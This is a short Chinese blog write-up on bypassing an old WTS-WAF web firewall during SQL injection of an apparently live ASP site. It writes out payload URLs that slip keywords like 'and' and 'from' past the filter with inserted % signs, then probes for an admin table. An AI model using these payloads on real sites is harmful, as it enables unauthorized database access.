老版本WTS-WAF bypass小记

起因

挖漏洞的时候总是会遇到WAF,绕过记录

漏洞点

***view.asp?big=75&Id=1 漏洞点在Id参数

添加单引号报错

老版本WTS-WAF bypass小记

来一波老套的Id=1 and 1=1 ,出现防火墙

***view.asp?big=75&Id=1%20and%201=1

老版本WTS-WAF bypass小记

bypass

老版本WTS-WAF绕过很简单,在关键字里面加%符号即可

***view.asp?big=75&Id=1%20an%d%201=1

老版本WTS-WAF bypass小记

成功绕过

猜表

猜表名,这个地方使用burpsuite暴力跑就行,也可以手动测一些比较常规的表名,例如admin

***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20admin)

老版本WTS-WAF bypass小记

说明存在admin表,为了证明语句没错,再测一下manager

***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20manager)

老版本WTS-WAF bypass小记

说明注入语句没错,manager表不存在

点到为止

参考链接

上一篇:【看过不等于学会】一切从资产梳理开始--bypass


下一篇:本站目录